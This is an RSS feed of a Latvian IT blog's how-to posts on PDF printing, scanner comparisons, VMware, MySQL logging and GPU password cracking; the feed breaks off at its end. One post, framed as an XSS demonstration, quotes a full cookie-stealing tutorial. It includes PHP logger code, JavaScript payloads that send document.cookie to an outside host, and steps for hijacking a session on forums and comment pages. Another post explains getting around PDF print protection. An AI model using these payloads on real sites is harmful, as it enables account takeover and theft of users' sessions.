<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT sviestapika &#187; How to</title>
	<atom:link href="http://dll.lv/category/how-to/feed" rel="self" type="application/rss+xml" />
	<link>http://dll.lv</link>
	<description>Par IT un ne tikai</description>
	<lastBuildDate>Sun, 29 Jan 2012 13:55:30 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Kā izdrukāt aizsargātu (no drukāšanas) pdf failu vai man ir tiesības uz visu..</title>
		<link>http://dll.lv/ka-izdrukat-aizsargatu-no-drukasanas-pdf-failu-vai-man-ir-tiesibas-uz-visu?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ka-izdrukat-aizsargatu-no-drukasanas-pdf-failu-vai-man-ir-tiesibas-uz-visu</link>
		<comments>http://dll.lv/ka-izdrukat-aizsargatu-no-drukasanas-pdf-failu-vai-man-ir-tiesibas-uz-visu#comments</comments>
		<pubDate>Sun, 29 Jan 2012 13:55:30 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Dzīve]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[GSView]]></category>
		<category><![CDATA[PDF]]></category>
		<category><![CDATA[Printing]]></category>
		<category><![CDATA[secured pdf]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1827</guid>
		<description><![CDATA[Materiāls paredzēts tikai informatīviem mērķiem. Populārzinātniskām vajadzībām bija nepieciešams drukātā veidā iegūt .pdf materiālu, kurš tika veidots kā SECURED PDF. Ilgi nebija jāgūglē un rezultāts bija vienkāršs. Vienīgā atšķirība no apraksta – noradītajā vietā šo programmu nevarēja vairs atrast. Bija &#8230; <a href="http://dll.lv/ka-izdrukat-aizsargatu-no-drukasanas-pdf-failu-vai-man-ir-tiesibas-uz-visu">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/ka-apskatit-pdf-dokumentus-izmantojot-nokia-symbian' rel='bookmark' title='Kā apskatīt PDF dokumentus izmantojot NOKIA (SYMBIAN)'>Kā apskatīt PDF dokumentus izmantojot NOKIA (SYMBIAN)</a></li>
<li><a href='http://dll.lv/ka-uzinstalet-aplikacijas-no-ovi-store-izmantojot-pc' rel='bookmark' title='Kā uzinstalēt aplikācijas no OVI store izmantojot PC'>Kā uzinstalēt aplikācijas no OVI store izmantojot PC</a></li>
<li><a href='http://dll.lv/ka-saglabat-flash-swf-failu-izmantojot-interneta-parluku-firefox-ie-utt' rel='bookmark' title='Kā saglabāt flash (swf) failu izmantojot interneta pārlūku (firefox, IE, utt)'>Kā saglabāt flash (swf) failu izmantojot interneta pārlūku (firefox, IE, utt)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Materiāls paredzēts tikai informatīviem mērķiem.<br />
Populārzinātniskām vajadzībām bija nepieciešams drukātā veidā iegūt .pdf materiālu, kurš tika veidots kā SECURED PDF.<br />
Ilgi nebija jāgūglē un rezultāts bija <a href="http://caplein.blogspot.com/2007/07/how-to-print-pdf-document-that-disable.html">vienkāršs.</a><br />
<span id="more-1827"></span><br />
Vienīgā atšķirība no apraksta – noradītajā vietā šo programmu nevarēja vairs atrast. Bija jāuzstāda jaunāka – 5.0 versija no <a href="http://pages.cs.wisc.edu/~ghost/gsview/get50.htm">šejienes.</a></p>
<blockquote><p>
I had couple of instances where I wanted to print PDF documents but couldn’t do so since the print option was disabled. Tried many ways, searched in the web but no help until the other day to my surprise I got this tool called GSView.</p>
<p>Using GSView we can print PDF documents even though the printing option is disabled. But to use GSView we also need to install another tool called Ghostscript. You can download these tools from:<br />
Ghostscript</p>
<p>http://pages.cs.wisc.edu/~ghost/doc/AFPL/get851.htm</p>
<p>GSView</p>
<p>http://pages.cs.wisc.edu/~ghost/gsview/get47.htm</p>
<p>How to do use this tool:<br />
•	Download and install Ghostscript<br />
•	Download, Install and run GSView<br />
•	Open the GSView Tool and open the PDF document you can’t print.<br />
•	Go to File -> Print as you normally would.<br />
I tried this tool and it worked for me.
</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/ka-apskatit-pdf-dokumentus-izmantojot-nokia-symbian' rel='bookmark' title='Kā apskatīt PDF dokumentus izmantojot NOKIA (SYMBIAN)'>Kā apskatīt PDF dokumentus izmantojot NOKIA (SYMBIAN)</a></li>
<li><a href='http://dll.lv/ka-uzinstalet-aplikacijas-no-ovi-store-izmantojot-pc' rel='bookmark' title='Kā uzinstalēt aplikācijas no OVI store izmantojot PC'>Kā uzinstalēt aplikācijas no OVI store izmantojot PC</a></li>
<li><a href='http://dll.lv/ka-saglabat-flash-swf-failu-izmantojot-interneta-parluku-firefox-ie-utt' rel='bookmark' title='Kā saglabāt flash (swf) failu izmantojot interneta pārlūku (firefox, IE, utt)'>Kā saglabāt flash (swf) failu izmantojot interneta pārlūku (firefox, IE, utt)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ka-izdrukat-aizsargatu-no-drukasanas-pdf-failu-vai-man-ir-tiesibas-uz-visu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kā nodemonstrēt XSS ievainojamību</title>
		<link>http://dll.lv/ka-nodemonstret-xss-ievainojamibu?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ka-nodemonstret-xss-ievainojamibu</link>
		<comments>http://dll.lv/ka-nodemonstret-xss-ievainojamibu#comments</comments>
		<pubDate>Sat, 21 Jan 2012 16:02:35 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1804</guid>
		<description><![CDATA[Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot autora izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma. Otrs veids ir izmantot šo pieeju. Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies &#8230; <a href="http://dll.lv/ka-nodemonstret-xss-ievainojamibu">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot <a href="http://hackiteasy.blogspot.com/2011/01/session-hijacking-or-cookie-stealing.html">autora</a> izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma.</p>
<p>Otrs veids ir izmantot <a href="http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/">šo</a> pieeju.<br />
<span id="more-1804"></span><br />
Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies izmantojot <a href="http://jehiah.cz/a/xss-stealing-cookies-101">šo</a> piemēru:</p>
<p>&lt;p&gt;script><br />
new Image().src=&#8221;http://jehiah.com/_sandbox/log.cgi?c=&#8221;+encodeURI(document.cookie);<br />
&lt;p&gt;/script></p>
<blockquote><p>In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim&#8217;s computer (see HTTP cookie theft).</p>
<p>Here we show how you can hack a session using javascript and php.</p>
<p>What is a cookie?</p>
<p>A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.<br />
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.<br />
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.</p>
<p>What can we do after stealing cookie?</p>
<p>Well,as we know web sites authenticate their user&#8217;s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.</p>
<p>This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.</p>
<p>PHP Code:<br />
<!--?php function GetIP() { if (getenv("HTTP_CLIENT_IP") &#038;&#038; strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") &#038;&#038; strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") &#038;&#038; strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) &#038;&#038; $_SERVER['REMOTE_ADDR'] &#038;&#038; strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie "); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?--></p>
<p>Save the script as a cookielogger.php on your server.<br />
(You can get any free webhosting easily such as justfree,x10hosting etc..)</p>
<p>Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.</p>
<p>Now for the hack to work we have to inject this piece of javascript into the target&#8217;s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.</p>
<p>The best way is to look for user interactive sites which contain comments or forums.</p>
<p>Post the following code which invokes or activates the cookielogger on your host.</p>
<p>Code:<br />
&lt;p&gt;script type=&#8221;text/javascript&#8221; language=&#8221;Java script&#8221;>// <![CDATA[<br />
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;<br />
// ]]&gt;&lt;p&gt;/script></p>
<p>Your can also trick the victim into clicking a link that activates javascript.<br />
Below is the code which has to be posted.</p>
<p>Code:<br />
&lt;p&gt;a href=&#8221;java script:document.location=&#8217;http://www.yourhost.com/cookielogger.php?cookie=&#8217;+document.cookie;&#8221;>Click here!</a></p>
<p>Clicking an image also can activate the script.For this purpose you can use the below code.</p>
<p>Code:</p>
<p>&lt;p&gt;img src=&#8221;URL OF THE IMAGE&#8221; alt=&#8221;" /></p>
<p>All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver</p>
<p>In the above codes please remove the space in between javascript.</p>
<p>Hijacking the Session:</p>
<p>Now we have cookie,what to do with this..?<br />
Download cookie editor mozilla plugin or you may find other plugins as well.</p>
<p>Go to the target site&#8211;&gt;open cookie editor&#8211;&gt;Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573</p>
<p>Don&#8217;t forget to comment if you like my post.<br />
by hackiteasy</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ka-nodemonstret-xss-ievainojamibu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WEB aplikāciju testēšanas rīku salīdzinājums</title>
		<link>http://dll.lv/web-aplikaciju-testesanas-riku-salidzinajums?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=web-aplikaciju-testesanas-riku-salidzinajums</link>
		<comments>http://dll.lv/web-aplikaciju-testesanas-riku-salidzinajums#comments</comments>
		<pubDate>Mon, 28 Nov 2011 09:23:31 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[penetration test]]></category>
		<category><![CDATA[WAVSEP]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1742</guid>
		<description><![CDATA[Internetā ir pieejams WAVSEP (Web Application Vulnerability Scanner Evaluation Project) projekts, kurš izmantojot dažādus scenārijus salīdzina aplikāciju testēšanas rīkus. Tiek testēts izmantojot šādus testus: Project WAVSEP currently consists of the following test cases: 64 Reflected XSS test cases (32 GET &#8230; <a href="http://dll.lv/web-aplikaciju-testesanas-riku-salidzinajums">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/testesanas-riki' rel='bookmark' title='WEB testēšanas rīki'>WEB testēšanas rīki</a></li>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Internetā ir pieejams WAVSEP (Web Application Vulnerability Scanner Evaluation Project) projekts, kurš izmantojot dažādus scenārijus salīdzina aplikāciju testēšanas rīkus.</p>
<p>Tiek testēts izmantojot šādus testus:</p>
<p><em>Project WAVSEP currently consists of the following test cases:</em></p>
<p><em>64 Reflected XSS test cases (32 GET cases, 32 POST cases -&gt; 66 total vulnerabilities)</em></p>
<p><em>130 SQL Injection test cases, most of them implemented for MySQL &amp; MSSQL (65 GET cases, 65 POST Vases -&gt; 136 total vulnerabilities)</em></p>
<p><em>o The list of test cases includes vulnerable pages that respond with 500 HTTP errors, 200 HTTP Responses with erroneous text, 200 HTTP Responses with differentiation or completely identical 200 HTTP responses.</em></p>
<p><em>o 80 out of 136 cases are simple SQL injection test cases (500 &amp; 200 erroneous HTTP responses), and 56 are Blind SQL Injection test cases (valid and identical 200 HTTP responses).</em></p>
<p><em> 7 different categories of false positive Reflected XSS vulnerabilities (GET OR POST).</em></p>
<p><em>10 different categories of false positive SQL Injection vulnerabilities (GET OR POST)</em></p>
<p>Projekts tiek hostēts iekš <a href="http://code.google.com/p/wavsep/">googles</a> un vairāk par to var lasīt izstrādātāja <a href="http://sectooladdict.blogspot.com">blogā</a>.</p>
<p>Principā ir laiks pārvērtēt izmantotos rīkus.</p>
<p>Kādu laiku atpakaļ pats testēju vairākus atvērtā tipa rīkus izmantojot vienkāršu scenāriju- uzstādīju vairākas vecas wordpress un joomla versijas ar zināmiem ievainojumiem. Diemžēl rezultāts mani apbēdināja, jo bieži rīki nespēja atrast pat dažas ļoti vienkārša XSS ievainojamības.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/testesanas-riki' rel='bookmark' title='WEB testēšanas rīki'>WEB testēšanas rīki</a></li>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/web-aplikaciju-testesanas-riku-salidzinajums/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows 8 izmantojot Vmware player</title>
		<link>http://dll.lv/windows-8-izmantojot-vmware-player?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=windows-8-izmantojot-vmware-player</link>
		<comments>http://dll.lv/windows-8-izmantojot-vmware-player#comments</comments>
		<pubDate>Fri, 07 Oct 2011 06:14:26 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Vmware]]></category>
		<category><![CDATA[Vmware player]]></category>
		<category><![CDATA[Windows 8]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1731</guid>
		<description><![CDATA[Kā to izdarīt ir aprakstīts te. Lai uzinstalētu Windows8 ar Vmware player 3 nepietiek. Ir nepieciešama 4 versija, kuru diemžēl atsevišķi nolādēt nevar. Ir jāuzstāda trial versija Vmware Workstation, kura uzinstalē arī Vmwares player 4 versiju. Pirmais iespaids ar Windows &#8230; <a href="http://dll.lv/windows-8-izmantojot-vmware-player">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/telnet-and-windows-7-vista' rel='bookmark' title='Telnet and Windows 7 (Vista)'>Telnet and Windows 7 (Vista)</a></li>
<li><a href='http://dll.lv/windows-7-update-s' rel='bookmark' title='Windows 7 Update (s)'>Windows 7 Update (s)</a></li>
<li><a href='http://dll.lv/padaram-windows-atraku-xpvista' rel='bookmark' title='Padaram Windows ātrāku (XP/Vista)'>Padaram Windows ātrāku (XP/Vista)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Kā to izdarīt ir aprakstīts <a href="http://tseonet.blogspot.com/2011/09/installing-windows-8-developer-preview.html" target="_blank">te</a>.</p>
<p>Lai uzinstalētu Windows8 ar Vmware player 3 nepietiek. Ir nepieciešama 4 versija, kuru diemžēl atsevišķi nolādēt nevar. Ir jāuzstāda trial versija Vmware Workstation, kura uzinstalē arī Vmwares player 4 versiju.</p>
<p>Pirmais iespaids ar Windows 8 tāds interesants, XP galīgi nav līdzīgs <img src='http://dll.lv/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/telnet-and-windows-7-vista' rel='bookmark' title='Telnet and Windows 7 (Vista)'>Telnet and Windows 7 (Vista)</a></li>
<li><a href='http://dll.lv/windows-7-update-s' rel='bookmark' title='Windows 7 Update (s)'>Windows 7 Update (s)</a></li>
<li><a href='http://dll.lv/padaram-windows-atraku-xpvista' rel='bookmark' title='Padaram Windows ātrāku (XP/Vista)'>Padaram Windows ātrāku (XP/Vista)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/windows-8-izmantojot-vmware-player/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MySql SQL vaicājumu monitorings</title>
		<link>http://dll.lv/mysql-sql-vaicajumu-monitorings?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=mysql-sql-vaicajumu-monitorings</link>
		<comments>http://dll.lv/mysql-sql-vaicajumu-monitorings#comments</comments>
		<pubDate>Wed, 14 Sep 2011 10:18:23 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[MySQL]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1711</guid>
		<description><![CDATA[Dažreiz rodas nepieciešamība paskatīties kādus tieši vaicājumus konkrēta sistēma veic datubāzei. To pavisam vienkārši var izdarīt MySql konfigurācijas failā iespējojot SQL attēlošanu. /etc/msql/my.cnf failā atrodam un atspējojam: general_log_file = /var/log/mysql/mysql.log general_log =1 //turpat var ieslēgt arī logot tikai vaicājumus, kuri &#8230; <a href="http://dll.lv/mysql-sql-vaicajumu-monitorings">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/reset-mysql-password' rel='bookmark' title='Reset MySQL password'>Reset MySQL password</a></li>
<li><a href='http://dll.lv/izraksts-no-php-un-mysql' rel='bookmark' title='Izraksts no PHP un MySql'>Izraksts no PHP un MySql</a></li>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Dažreiz rodas nepieciešamība paskatīties kādus tieši vaicājumus konkrēta sistēma veic datubāzei.<br />
To pavisam vienkārši var izdarīt MySql konfigurācijas failā iespējojot SQL attēlošanu.<br />
/etc/msql/my.cnf failā atrodam un atspējojam:<br />
general_log_file = /var/log/mysql/mysql.log<br />
general_log =1</p>
<p>//turpat var ieslēgt arī logot tikai vaicājumus, kuri izpildās ilgi<br />
Lai izmaiņas stātos spēkā ir jārestartē MySql:<br />
restart mysql<br />
un skatāmies rezultātu:<br />
tail –f /var/log/mysql/mysql.log<br />
Wordpress sākumlapas attēlošanai veic aptuveni šādus SQL pieprasījumus:<br />
<img alt="" src="http://dll.lv/wp-content/uploads/2011/09/mysql.JPG" class="alignnone" width="310" height="187" /></p>
<p>Otrs variants, kā paskatīties SQL, bet neveicot MySql restartu ir mysql konsolē ievadīt:<br />
mysql> SET GLOBAL general_log = &#8216;ON&#8217;;<br />
Query OK, 0 rows affected (0.00 sec)</p>
<p>Tikai tad SQL pieprasījumi tiek ierakstīti citā failā:<br />
tail –f /var/log/mysql/bt.log</p>
<p>Ja ir kāda neskaidrība, kas ir ieslēgts un kurā failā kas tiek rakstīts:<br />
Apskatīt iestatītos logošamans parametrus var:<br />
mysql>show variables like &#8216;%log%&#8217;;</p>
<p>!Jāatceras, ka pati logošana atstāj būtisku iespaidu uz veiktspēju.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/reset-mysql-password' rel='bookmark' title='Reset MySQL password'>Reset MySQL password</a></li>
<li><a href='http://dll.lv/izraksts-no-php-un-mysql' rel='bookmark' title='Izraksts no PHP un MySql'>Izraksts no PHP un MySql</a></li>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/mysql-sql-vaicajumu-monitorings/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Ar grafiskā procesora palīdzību paroles var uzlauzt daudz ātrāk</title>
		<link>http://dll.lv/ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak</link>
		<comments>http://dll.lv/ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak#comments</comments>
		<pubDate>Fri, 02 Sep 2011 05:52:51 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1709</guid>
		<description><![CDATA[Diezgan biedējoši- tam, kam agrāk vajadzēja 43 gadus, tagad pietiek ar 48 dienām bez lielas piepūles. Pati pieeja nav jauna, bet gribēju padalīties ar labu rakstu, kur autors detalizētāki ir papētījis šo jautājumu. Ir vērts izlasīt. Un vēl viena cilvēka &#8230; <a href="http://dll.lv/ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/kad-efektivitate-var-but-kaitiga' rel='bookmark' title='Kad efektivitāte var būt kaitīga'>Kad efektivitāte var būt kaitīga</a></li>
<li><a href='http://dll.lv/meklejot-letako-hostingu-vai-ari-vai-hostejot-var-kaut-ko-nopelnit' rel='bookmark' title='Meklējot lētāko hostingu vai arī- vai hostējot var kaut ko nopelnīt?'>Meklējot lētāko hostingu vai arī- vai hostējot var kaut ko nopelnīt?</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Diezgan biedējoši- tam, kam agrāk vajadzēja 43 gadus, tagad pietiek ar 48 dienām bez lielas piepūles.<br />
Pati pieeja nav jauna, bet gribēju padalīties ar labu <a href="http://erratasec.blogspot.com/2011/06/password-cracking-mining-and-gpus.html">rakstu</a>, kur autors detalizētāki ir papētījis šo jautājumu. Ir vērts izlasīt.<br />
Un vēl viena cilvēka <a href="http://mytechencounters.wordpress.com/2011/04/03/gpu-password-cracking-crack-a-windows-password-using-a-graphic-card/">pētījums</a>.<br />
Es gan nepiekrītu abiem autoriem, ka paroles sākot no 10 simboliem ir drošībā, jo slodzi var sadalīt un pateicoties mākoņdatošanas pakalpojumiem vajag tikai noīrēt vairāk dzelžu.<br />
Šis gan attiecas uz paroļu minēšanu, kura padodas brute-force uzbrukumam.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/kad-efektivitate-var-but-kaitiga' rel='bookmark' title='Kad efektivitāte var būt kaitīga'>Kad efektivitāte var būt kaitīga</a></li>
<li><a href='http://dll.lv/meklejot-letako-hostingu-vai-ari-vai-hostejot-var-kaut-ko-nopelnit' rel='bookmark' title='Meklējot lētāko hostingu vai arī- vai hostējot var kaut ko nopelnīt?'>Meklējot lētāko hostingu vai arī- vai hostējot var kaut ko nopelnīt?</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Laika un sevis vadība</title>
		<link>http://dll.lv/laika-un-sevis-vadiba?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=laika-un-sevis-vadiba</link>
		<comments>http://dll.lv/laika-un-sevis-vadiba#comments</comments>
		<pubDate>Mon, 08 Aug 2011 03:59:32 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Domu grauds]]></category>
		<category><![CDATA[Dzīve]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[efektivitāte]]></category>
		<category><![CDATA[Laika vadība]]></category>
		<category><![CDATA[personīgā efektivitāte]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1697</guid>
		<description><![CDATA[Interesants video ir ievietots http://web.hc.lv/motivacija-idejas/raksti/laika-menedzments/ kuru var klausīties darot ko paralēli, piemēram, esot ceļā vai tīrot māju. Galvenās  atziņas: Pie viena darba jāstrādā nepārtraukti- vismaz 2h. Vairāku darbu darīšana nav efektīva. Jāievēro sava ķermeņa bioritms- katram ir savs produktīvākais laiks. Jāizveido &#8230; <a href="http://dll.lv/laika-un-sevis-vadiba">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/parmainu-vadiba' rel='bookmark' title='Pārmaiņu vadība'>Pārmaiņu vadība</a></li>
<li><a href='http://dll.lv/personiga-efektivitate' rel='bookmark' title='Personīgā efektivitāte'>Personīgā efektivitāte</a></li>
